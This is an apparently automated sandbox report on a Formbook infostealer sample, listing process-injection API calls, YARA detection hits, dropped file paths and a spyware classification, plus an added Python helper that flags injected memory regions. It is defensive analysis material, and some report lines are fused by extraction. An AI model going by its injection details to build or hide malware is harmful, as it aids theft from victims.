            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B98A0 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9950 NtQueueApcThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9520 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044BAD30 NtSetContextThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B99D0 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B95F0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9670 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9A00 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9A10 NtQuerySection
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9A20 NtResumeThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9A80 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9760 NtOpenProcess
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044BA770 NtOpenThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044BA710 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9730 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B97A0 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044BA3B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9CA0 NtCreateFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9D50 NtReadFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9DD0 NtClose
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9E80 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9C5A NtCreateFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9CF2 NtCreateFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9C9A NtCreateFile
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004E9E7A NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 0_2_014794A8
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 0_2_0147DB4C
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 0_2_0147C3A0
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 0_2_0147E211
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 0_2_0147A758
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00401030
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_0041D363
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00402D87
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00402D90
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00409E1B
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00409E20
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_0041DED5
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_0041CEE6
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00402FB0
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0453D466
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04531002
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0448841F
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_045428EC
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0448B090
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044A20A0
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_045420A8
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04541D55
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0447F900
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04542D07
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04470D20
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04494120
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_045425DD
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0448D5E0
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044A2581
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04496E30
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04542EF7
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_045422AE
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04542B28
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_0453DBD2
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_04541FF1
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044AEBB0
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004ED364
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004D2D87
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_004D2D90
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D9E1B16_2_004D9E1B
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D9E2016_2_004D9E20
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004EDED516_2_004EDED5
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004ECEE616_2_004ECEE6
            Source: C:\Windows\SysWOW64\control.exeCode function: 16_2_004D2FB016_2_004D2FB0
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016E94A826_2_016E94A8
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EDB4C26_2_016EDB4C
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EC14826_2_016EC148
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EE21226_2_016EE212
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EA75826_2_016EA758
            Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exeCode function: 26_2_016EF9B726_2_016EF9B7
            Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0447B150 appears 35 times
            Source: CN03716-20.exe | Binary or memory string: OriginalFilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000000.252168488.000000000096F000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298584201.0000000007EA0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298137296.0000000007980000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000003.275250102.0000000001236000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEminem.dll< vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298294757.0000000007B30000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameButterFly.dll< vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN03716-20.exe
            Source: CN03716-20.exe | Binary or memory string: OriginalFilename vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.339108981.0000000000B1F000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.340963412.00000000019A5000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs CN03716-20.exe
            Source: CN03716-20.exe, 00000007.00000002.340495405.000000000189F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CN03716-20.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
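The Yara hits above are reported per memory dump, and the dump name itself carries the process index, the base address and the page protection of the region that matched. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report nor of the yara-signator or JPCERT rules it cites. It parses lines in the layout used here (fused "MEMORYMatched rule:" and separated "MEMORY | Matched rule:" forms are both accepted), decodes the dump name under the assumption, read off this report's own identifiers, that the fields are pid.iteration.dumpid.base.protect.kind with the last field left uninterpreted, and flags Formbook matches that sit in PAGE_EXECUTE_READWRITE memory of a process other than the submitted sample. That is the pattern behind the injection verdicts on this page: control.exe is process index 16 and srmdufw81bmhwhwh.exe is index 30 in the "Code function" and unpack entries. The input lines are constructed from entries on this page, and the index-to-image map is taken from those same entries.

```python
import re
from collections import defaultdict

# Constructed input: a handful of "Matched rule" lines copied from this report.
# One line is left in the fused form the extraction produced, to show the parser copes.
REPORT_LINES = """
Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23
"""

# Process index -> image, as read off the "Code function: N_2_..." and unpack entries of this report.
PROCESS_NAMES = {
    0: "CN03716-20.exe",
    7: "CN03716-20.exe",
    16: r"C:\Windows\SysWOW64\control.exe",
    26: r"C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe",
    30: "srmdufw81bmhwhwh.exe",
}

# Windows page-protection constants (winnt.h); the dump name stores one of these in hex.
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# "type" is matched lazily so both "MEMORYMatched rule:" and "MEMORY | Matched rule:" parse.
HIT_RE = re.compile(r"^Source: (?P<src>[^,]+), type: (?P<type>[A-Z]+?)\s*\|?\s*Matched rule: (?P<rule>\S+)")
# Assumed dump-name layout: pid.iteration.dumpid.base.protect.kind.sdmp (hex fields, dumpid decimal).
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<iter>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_hits(text):
    """Turn report lines into dicts; dump-derived fields stay None for unpacked-PE sources."""
    hits = []
    for line in text.splitlines():
        m = HIT_RE.match(line.strip())
        if not m:
            continue
        hit = {"source": m["src"], "type": m["type"], "rule": m["rule"],
               "pid": None, "base": None, "protect": None}
        d = SDMP_RE.match(m["src"])
        if d:
            hit["pid"] = int(d["pid"], 16)
            hit["base"] = int(d["base"], 16)
            hit["protect"] = int(d["prot"], 16)
        hits.append(hit)
    return hits


def injected_rwx_hits(hits, sample_pids=(0, 7)):
    """Matches in RWX memory of processes other than the sample's own.

    The sample's own processes also carry RWX Formbook regions (the loader hollows a copy
    of itself), so they are filtered by default; what is left is evidence of foreign injection."""
    return [h for h in hits
            if h["protect"] == PAGE_EXECUTE_READWRITE and h["pid"] not in sample_pids]


def summarize(hits):
    """Process index -> (image name, sorted rule names) for every dump-backed hit."""
    by_pid = defaultdict(set)
    for h in hits:
        if h["pid"] is not None:
            by_pid[h["pid"]].add(h["rule"])
    return {pid: (PROCESS_NAMES.get(pid, "unknown"), sorted(rules)) for pid, rules in by_pid.items()}


if __name__ == "__main__":
    parsed = parse_hits(REPORT_LINES)
    for pid, (image, rules) in sorted(summarize(parsed).items()):
        print(f"process {pid:>2} {image}: {', '.join(rules)}")
    for h in injected_rwx_hits(parsed):
        print(f"RWX injection candidate: pid {h['pid']} base {h['base']:#x} rule {h['rule']}")
```

Run as a script it prints one line per process index with the rules that fired there, then the hits in RWX regions outside the sample's own processes; on this report's data those are control.exe (index 16) and srmdufw81bmhwhwh.exe (index 30), which is what the "Injects a PE file into a foreign processes" and "Maps a DLL or memory area into another process" signatures in the overview describe. Dumps named after unpacked PEs carry no protection field and are summarized only by rule.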
            Source: CN03716-20.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: QZblaErkmXlkhK.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: srmdufw81bmhwhwh.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: CN03716-20.exe, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: QZblaErkmXlkhK.exe.0.dr, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.0.CN03716-20.exe.930000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.2.CN03716-20.exe.930000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 7.2.CN03716-20.exe.ae0000.1.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 7.0.CN03716-20.exe.ae0000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/12@4/2
            Source: C:\Windows\explorer.exe | File created: C:\Program Files (x86)\Iw6qlizi